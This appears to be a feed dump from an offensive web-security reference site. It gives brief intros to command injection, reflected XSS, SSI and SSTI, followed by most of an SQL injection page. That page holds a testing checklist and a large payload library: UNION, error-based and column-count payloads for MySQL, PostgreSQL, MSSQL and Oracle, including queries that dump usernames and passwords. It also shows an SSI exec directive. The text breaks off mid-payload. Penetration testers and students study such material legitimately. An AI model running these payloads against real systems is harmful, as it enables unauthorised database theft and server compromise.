Injection?</h2> <p>OS Command Injection occurs when an application passes <strong>user-controlled data to a system shell</strong> (or equivalent OS execution function) without adequate sanitization. The attacker&rsquo;s input is interpreted as shell commands rather than data — resulting in arbitrary code execution with the same privileges as the web server process.</p> <p>Even a single injectable parameter can result in full server compromise: credential harvesting, lateral movement, persistent access, data exfiltration.</p> Reflected XSS: Bypass & Encoding Arsenal https://az0th.it/web/input/020-input-xss-reflected/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/020-input-xss-reflected/ <h1 id="reflected-xss-bypass--encoding-arsenal">Reflected XSS: Bypass &amp; Encoding Arsenal</h1> <blockquote> <p><strong>Severity</strong>: High | <strong>CWE</strong>: CWE-79 | <strong>OWASP</strong>: A03:2021 <strong>Reference</strong>: <a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</a></p> </blockquote> <hr> <h2 id="how-sanitization-works--read-this-first">How Sanitization Works — Read This First</h2> <p>Before throwing payloads, understand what the filter does. Send this canary and read the raw response:</p> <pre tabindex="0"><code>Probe: &#39;&lt;&gt;&#34;/;`&amp;=(){}[] </code></pre><p>Map each character:</p> <table> <thead> <tr> <th>Character</th> <th>Encoded to</th> <th>Filter type</th> </tr> </thead> <tbody> <tr> <td><code>&lt;</code> → <code>&amp;lt;</code></td> <td>HTML encode</td> <td>htmlspecialchars / HtmlEncode</td> </tr> <tr> <td><code>&lt;</code> → removed</td> <td>Strip</td> <td>strip_tags / regex replace</td> </tr> <tr> <td><code>&lt;</code> → <code>%3C</code></td> <td>URL encode</td> <td>URL filter on reflected param</td> </tr> <tr> <td>unchanged</td> <td>Nothing</td> <td>Vulnerable directly</td> </tr> </tbody> </table> <p><strong>Encoding layers in a real app:</strong></p> Server-Side Includes (SSI) Injection https://az0th.it/web/input/009-input-ssi-injection/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/009-input-ssi-injection/ <h1 id="server-side-includes-ssi-injection">Server-Side Includes (SSI) Injection</h1> <blockquote> <p><strong>Severity</strong>: High–Critical | <strong>CWE</strong>: CWE-97 <strong>OWASP</strong>: A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-ssi-injection">What Is SSI Injection?</h2> <p>Server-Side Includes are directives embedded in HTML files that the web server processes before sending the response. When user input is reflected in <code>.shtml</code>, <code>.shtm</code>, <code>.stm</code>, or SSI-enabled pages without sanitization, injected directives execute with web-server privileges.</p> <pre tabindex="0"><code>Apache SSI directive syntax: &lt;!--#directive param=&#34;value&#34; --&gt; IIS SSI directive syntax: &lt;!--#include file=&#34;...&#34; --&gt; Injected: &lt;!--#exec cmd=&#34;id&#34; --&gt; → server executes &#39;id&#39; and includes output </code></pre><p>SSI is <strong>underrated</strong> in modern apps because:</p> Server-Side Template Injection (SSTI) https://az0th.it/web/input/007-input-ssti/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/007-input-ssti/ <h1 id="server-side-template-injection-ssti">Server-Side Template Injection (SSTI)</h1> <blockquote> <p><strong>Severity</strong>: Critical <strong>CWE</strong>: CWE-94 <strong>OWASP</strong>: A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-ssti">What Is SSTI?</h2> <p>Server-Side Template Injection occurs when user input is embedded <strong>unsanitized into a template that is then rendered server-side</strong>. Unlike XSS (where input is reflected in HTML), SSTI input is processed by the template engine itself — meaning arbitrary expressions, object traversal, and in most cases, <strong>OS command execution</strong>.</p> <p>The severity is almost always critical: most template engines provide access to the underlying language runtime, and sandbox escapes are well-documented for every major engine.</p> SQL Injection (SQLi) https://az0th.it/web/input/001-input-sqli/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/001-input-sqli/ <h1 id="sql-injection-sqli">SQL Injection (SQLi)</h1> <blockquote> <p><strong>Severity</strong>: Critical <strong>CWE</strong>: CWE-89 <strong>OWASP</strong>: A03:2021 – Injection</p> </blockquote> <hr> <h2 id="what-is-sql-injection">What Is SQL Injection?</h2> <p>SQL Injection occurs when user-supplied data is embedded into a SQL query without proper sanitization, allowing an attacker to manipulate the query&rsquo;s logic. The impact ranges from authentication bypass to full database dump, file read/write, and OS command execution — depending on the database engine and configuration.</p> <h3 id="injection-classes-at-a-glance">Injection Classes at a Glance</h3> <table> <thead> <tr> <th>Type</th> <th>Data Returned</th> <th>Detection</th> </tr> </thead> <tbody> <tr> <td><strong>Error-based</strong></td> <td>Error messages reveal DB info</td> <td>Syntax errors visible in response</td> </tr> <tr> <td><strong>Union-based</strong></td> <td>Data returned in response body</td> <td><code>ORDER BY</code> / <code>UNION</code> technique</td> </tr> <tr> <td><strong>Boolean-based blind</strong></td> <td>True/False behavioral difference</td> <td>Response size or content change</td> </tr> <tr> <td><strong>Time-based blind</strong></td> <td>No output — only timing</td> <td><code>SLEEP()</code> / <code>WAITFOR DELAY</code></td> </tr> <tr> <td><strong>Out-of-Band (OOB)</strong></td> <td>DNS/HTTP exfiltration</td> <td>Collaborator / interactsh</td> </tr> <tr> <td><strong>Second-order</strong></td> <td>Payload stored, executed later</td> <td>Multi-step flows</td> </tr> <tr> <td><strong>Stacked queries</strong></td> <td>Execute multiple statements</td> <td>Depends on DB driver support</td> </tr> </tbody> </table> <hr> <h2 id="attack-surface-map">Attack Surface Map</h2> <h3 id="entry-points-to-test">Entry Points to Test</h3> <pre tabindex="0"><code># URL parameters: /items?id=1 /search?q=admin /user?name=john&amp;sort=id # POST body (form, JSON, XML): {&#34;username&#34;:&#34;admin&#34;,&#34;password&#34;:&#34;pass&#34;} username=admin&amp;password=pass # HTTP headers: User-Agent: Mozilla/5.0 Referer: https://site.com/page X-Forwarded-For: 127.0.0.1 Cookie: session=abc; user_id=1 X-Custom-Header: value # REST paths: /api/users/1 /api/product/electronics/laptop # Search &amp; filter fields # Order/sort parameters # Pagination: limit, offset, page # File names in download endpoints # GraphQL variables that hit SQL backend # XML / SOAP bodies # WebSocket messages </code></pre><hr> <h2 id="discovery-checklist">Discovery Checklist</h2> <h3 id="phase-1--passive-identification">Phase 1 — Passive Identification</h3> <ul> <li><input disabled="" type="checkbox"> Map all parameters that interact with the server (URL, body, headers, cookies)</li> <li><input disabled="" type="checkbox"> Identify parameters that clearly reflect data from a database (user info, products, results)</li> <li><input disabled="" type="checkbox"> Note parameters used for filtering, ordering, searching, or paginating</li> <li><input disabled="" type="checkbox"> Check if numeric parameters can be replaced with expressions (<code>1+1</code>, <code>2-1</code>)</li> <li><input disabled="" type="checkbox"> Identify multi-step flows where input stored in step 1 is used in a query in step 2 (second-order)</li> <li><input disabled="" type="checkbox"> Review JavaScript for client-side constructed query strings sent to API</li> <li><input disabled="" type="checkbox"> Look for verbose error messages (stack traces, DB errors, query fragments)</li> </ul> <h3 id="phase-2--active-detection">Phase 2 — Active Detection</h3> <ul> <li><input disabled="" type="checkbox"> Inject a single quote <code>'</code> — observe error vs no error</li> <li><input disabled="" type="checkbox"> Inject <code>''</code> (escaped quote) — does the response return to normal?</li> <li><input disabled="" type="checkbox"> Inject <code>1 AND 1=1</code> vs <code>1 AND 1=2</code> — boolean difference?</li> <li><input disabled="" type="checkbox"> Inject <code>1 OR 1=1</code> — does result set expand?</li> <li><input disabled="" type="checkbox"> Inject <code>1; SELECT SLEEP(5)</code> — does response delay?</li> <li><input disabled="" type="checkbox"> Inject comment sequences: <code>--</code>, <code>#</code>, <code>/**/</code>, <code>/*!*/</code></li> <li><input disabled="" type="checkbox"> Try numeric context: <code>1+1</code> returns same as <code>2</code>?</li> <li><input disabled="" type="checkbox"> Inject <code>ORDER BY 1</code>, <code>ORDER BY 100</code> — error on high number reveals column count</li> <li><input disabled="" type="checkbox"> Try <code>UNION SELECT NULL</code> with increasing NULLs until no error</li> <li><input disabled="" type="checkbox"> Test string context: <code>' OR '1'='1</code></li> <li><input disabled="" type="checkbox"> Test time-based in all parameters including headers and cookies</li> </ul> <h3 id="phase-3--confirm--escalate">Phase 3 — Confirm &amp; Escalate</h3> <ul> <li><input disabled="" type="checkbox"> Determine injectable context (string, numeric, identifier)</li> <li><input disabled="" type="checkbox"> Determine database engine (error messages, behavior, functions)</li> <li><input disabled="" type="checkbox"> Find column count via <code>ORDER BY</code></li> <li><input disabled="" type="checkbox"> Find printable columns via <code>UNION SELECT NULL,NULL,...</code></li> <li><input disabled="" type="checkbox"> Extract DB version, current user, current database</li> <li><input disabled="" type="checkbox"> Enumerate databases → tables → columns → data</li> <li><input disabled="" type="checkbox"> Check for FILE privileges (MySQL: <code>LOAD_FILE</code>, <code>INTO OUTFILE</code>)</li> <li><input disabled="" type="checkbox"> Check for xp_cmdshell (MSSQL)</li> <li><input disabled="" type="checkbox"> Test OOB exfiltration (DNS via <code>load_file</code>, <code>UTL_HTTP</code>, <code>xp_dirtree</code>)</li> <li><input disabled="" type="checkbox"> Test stacked queries for write/exec capabilities</li> </ul> <hr> <h2 id="payload-library">Payload Library</h2> <h3 id="section-1--detection--syntax-break">Section 1 — Detection &amp; Syntax Break</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- Basic quote injection: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;&#39; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">` </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span>) </span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;)) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Comment terminators: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; -- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#f92672">#</span> </span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; /* </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span><span style="color:#75715e">/**/</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;/*!--*/ </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Numeric context: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">1 AND 1=1 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">1 AND 1=2 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">1 OR 1=1 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">1 OR 1=2 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Always-true / always-false: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">OR</span> <span style="color:#e6db74">&#39;1&#39;</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#39;1 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">OR</span> <span style="color:#e6db74">&#39;1&#39;</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#39;2 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">OR</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">=</span><span style="color:#ae81ff">1</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; OR 1=2-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Expression injection (confirms evaluation): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">1+1 -- should behave like 2 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">1*1 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">9-8 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Nested quotes: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;&#39;&#39;&#39; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;&#39;||&#39;&#39; </span></span></span></code></pre></div><h3 id="section-2--column-count-order-by">Section 2 — Column Count (ORDER BY)</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#66d9ef">ORDER</span> <span style="color:#66d9ef">BY</span> <span style="color:#ae81ff">1</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">ORDER</span> <span style="color:#66d9ef">BY</span> <span style="color:#ae81ff">2</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">ORDER</span> <span style="color:#66d9ef">BY</span> <span style="color:#ae81ff">3</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">ORDER</span> <span style="color:#66d9ef">BY</span> <span style="color:#ae81ff">100</span><span style="color:#75715e">-- -- triggers error when &gt; actual column count </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">ORDER</span> <span style="color:#66d9ef">BY</span> <span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">2</span>,<span style="color:#ae81ff">3</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">ORDER</span> <span style="color:#66d9ef">BY</span> <span style="color:#ae81ff">1</span> <span style="color:#66d9ef">ASC</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">ORDER</span> <span style="color:#66d9ef">BY</span> <span style="color:#ae81ff">1</span> <span style="color:#66d9ef">DESC</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- With URL encoding: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; ORDER BY 1-- -- standard </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">ORDER</span> <span style="color:#66d9ef">BY</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">%</span><span style="color:#ae81ff">23</span> <span style="color:#75715e">-- # encoded </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; ORDER BY 1%2f%2a -- /* encoded </span></span></span></code></pre></div><h3 id="section-3--union-based-extraction">Section 3 — Union-Based Extraction</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- Find number of columns (increase NULLs until no error): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT NULL-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">NULL</span>,<span style="color:#66d9ef">NULL</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT NULL,NULL,NULL-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Find printable columns (replace NULL one at a time with string): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#e6db74">&#39;a&#39;</span>,<span style="color:#66d9ef">NULL</span>,<span style="color:#66d9ef">NULL</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT NULL,&#39;</span>a<span style="color:#e6db74">&#39;,NULL-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">NULL</span>,<span style="color:#66d9ef">NULL</span>,<span style="color:#e6db74">&#39;a&#39;</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Extract data (MySQL): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT 1,version(),3-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#ae81ff">1</span>,<span style="color:#66d9ef">user</span>(),<span style="color:#ae81ff">3</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT 1,database(),3-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#ae81ff">1</span>,<span style="color:#f92672">@@</span>datadir,<span style="color:#ae81ff">3</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT 1,@@version_compile_os,3-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#ae81ff">1</span>,group_concat(<span style="color:#66d9ef">schema_name</span>),<span style="color:#ae81ff">3</span> <span style="color:#66d9ef">FROM</span> information_schema.schemata<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#ae81ff">1</span>,group_concat(<span style="color:#66d9ef">column_name</span>),<span style="color:#ae81ff">3</span> <span style="color:#66d9ef">FROM</span> information_schema.columns <span style="color:#66d9ef">WHERE</span> <span style="color:#66d9ef">table_name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#39;users&#39;</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT 1,group_concat(username,&#39;</span>:<span style="color:#e6db74">&#39;,password),3 FROM users-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- PostgreSQL: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">NULL</span>,<span style="color:#66d9ef">version</span>(),<span style="color:#66d9ef">NULL</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT NULL,current_database(),NULL-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">NULL</span>,<span style="color:#66d9ef">current_user</span>,<span style="color:#66d9ef">NULL</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT NULL,string_agg(datname,&#39;</span>,<span style="color:#e6db74">&#39;),NULL FROM pg_database-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">NULL</span>,string_agg(tablename,<span style="color:#e6db74">&#39;,&#39;</span>),<span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">FROM</span> pg_tables <span style="color:#66d9ef">WHERE</span> schemaname<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;public&#39;</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT NULL,string_agg(column_name,&#39;</span>,<span style="color:#e6db74">&#39;),NULL FROM information_schema.columns WHERE table_name=&#39;</span>users<span style="color:#e6db74">&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">NULL</span>,string_agg(username<span style="color:#f92672">||</span><span style="color:#e6db74">&#39;:&#39;</span><span style="color:#f92672">||</span>password,<span style="color:#e6db74">&#39;,&#39;</span>),<span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">FROM</span> users<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- MSSQL: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT NULL,@@version,NULL-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">NULL</span>,db_name(),<span style="color:#66d9ef">NULL</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT NULL,user_name(),NULL-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">NULL</span>,(<span style="color:#66d9ef">SELECT</span> STRING_AGG(name,<span style="color:#e6db74">&#39;,&#39;</span>) <span style="color:#66d9ef">FROM</span> master.dbo.sysdatabases),<span style="color:#66d9ef">NULL</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT NULL,(SELECT STRING_AGG(name,&#39;</span>,<span style="color:#e6db74">&#39;) FROM sysobjects WHERE xtype=&#39;</span>U<span style="color:#e6db74">&#39;),NULL-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Oracle: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">NULL</span>,banner,<span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">FROM</span> v$version<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT NULL,user,NULL FROM dual-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">NULL</span>,(<span style="color:#66d9ef">SELECT</span> listagg(<span style="color:#66d9ef">table_name</span>,<span style="color:#e6db74">&#39;,&#39;</span>) WITHIN <span style="color:#66d9ef">GROUP</span> (<span style="color:#66d9ef">ORDER</span> <span style="color:#66d9ef">BY</span> <span style="color:#ae81ff">1</span>) <span style="color:#66d9ef">FROM</span> all_tables <span style="color:#66d9ef">WHERE</span> <span style="color:#66d9ef">owner</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#39;APPS&#39;</span>),<span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">FROM</span> dual<span style="color:#75715e">-- </span></span></span></code></pre></div><h3 id="section-4--error-based-extraction">Section 4 — Error-Based Extraction</h3> <h4 id="mysql-error-based">MySQL Error-Based</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- extractvalue (returns value in error message): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND extractvalue(1,concat(0x7e,version()))-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> extractvalue(<span style="color:#ae81ff">1</span>,concat(<span style="color:#ae81ff">0</span>x7e,<span style="color:#66d9ef">database</span>()))<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND extractvalue(1,concat(0x7e,user()))-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> extractvalue(<span style="color:#ae81ff">1</span>,concat(<span style="color:#ae81ff">0</span>x7e,(<span style="color:#66d9ef">SELECT</span> group_concat(<span style="color:#66d9ef">table_name</span>) <span style="color:#66d9ef">FROM</span> information_schema.tables <span style="color:#66d9ef">WHERE</span> table_schema<span style="color:#f92672">=</span><span style="color:#66d9ef">database</span>())))<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND extractvalue(1,concat(0x7e,(SELECT group_concat(username,&#39;</span>:<span style="color:#e6db74">&#39;,password) FROM users)))-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- updatexml: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> updatexml(<span style="color:#ae81ff">1</span>,concat(<span style="color:#ae81ff">0</span>x7e,<span style="color:#66d9ef">version</span>()),<span style="color:#ae81ff">1</span>)<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND updatexml(1,concat(0x7e,(SELECT password FROM users WHERE username=&#39;</span><span style="color:#66d9ef">admin</span><span style="color:#e6db74">&#39; LIMIT 1)),1)-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- floor/rand (old but reliable): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> (<span style="color:#66d9ef">SELECT</span> <span style="color:#ae81ff">1</span> <span style="color:#66d9ef">FROM</span> (<span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">COUNT</span>(<span style="color:#f92672">*</span>),CONCAT(<span style="color:#66d9ef">version</span>(),<span style="color:#ae81ff">0</span>x3a,FLOOR(RAND(<span style="color:#ae81ff">0</span>)<span style="color:#f92672">*</span><span style="color:#ae81ff">2</span>))x <span style="color:#66d9ef">FROM</span> information_schema.tables <span style="color:#66d9ef">GROUP</span> <span style="color:#66d9ef">BY</span> x)a)<span style="color:#75715e">-- </span></span></span></code></pre></div><h4 id="postgresql-error-based">PostgreSQL Error-Based</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- cast to int: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND 1=cast(version() as int)-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">=</span><span style="color:#66d9ef">cast</span>((<span style="color:#66d9ef">SELECT</span> password <span style="color:#66d9ef">FROM</span> users <span style="color:#66d9ef">LIMIT</span> <span style="color:#ae81ff">1</span>) <span style="color:#66d9ef">as</span> int)<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- substring trick: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND 1=1/(SELECT 1 FROM (SELECT substring(username,1,1) FROM users LIMIT 1) x WHERE x.substring=&#39;</span>a<span style="color:#e6db74">&#39;)-- </span></span></span></code></pre></div><h4 id="mssql-error-based">MSSQL Error-Based</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- convert: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND 1=convert(int,(SELECT TOP 1 name FROM sysobjects WHERE xtype=&#39;</span>U<span style="color:#e6db74">&#39;))-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">=</span><span style="color:#66d9ef">convert</span>(int,<span style="color:#f92672">@@</span><span style="color:#66d9ef">version</span>)<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- cast: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND 1=cast((SELECT TOP 1 password FROM users) as int)-- </span></span></span></code></pre></div><h4 id="oracle-error-based">Oracle Error-Based</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- utl_inaddr (DNS lookup — triggers error with data): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND 1=utl_inaddr.get_host_address((SELECT version FROM v$instance))-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- XMLType: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">=</span>(<span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">UPPER</span>(XMLType(chr(<span style="color:#ae81ff">60</span>)<span style="color:#f92672">||</span>chr(<span style="color:#ae81ff">58</span>)<span style="color:#f92672">||</span><span style="color:#66d9ef">version</span><span style="color:#f92672">||</span>chr(<span style="color:#ae81ff">62</span>))) <span style="color:#66d9ef">FROM</span> v$instance)<span 